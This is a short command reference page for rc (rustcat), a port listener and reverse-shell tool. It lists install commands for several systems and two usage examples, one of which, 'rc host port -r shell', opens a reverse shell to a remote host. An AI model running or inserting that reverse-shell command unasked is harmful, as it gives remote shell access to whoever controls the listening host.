rc
A modern simplistic port listener & reverse shell. Similar to nc. More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.
Install
- All systems
-
curl cmd.cat/rc.sh
- Debian
-
apt-get install rc - Ubuntu
-
apt-get install rc - Arch Linux
-
pacman -S rc - Kali Linux
-
apt-get install rc - Fedora
-
dnf install rc - Windows (WSL2)
-
sudo apt-get updatesudo apt-get install rc - OS X
-
brew install rc - Raspbian
-
apt-get install rc
A modern simplistic port listener & reverse shell. Similar to nc. More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.
-
Start listening on a specific port:
rc -lp port -
Start a reverse shell:
rc host port -r shell
© tl;dr; authors and contributors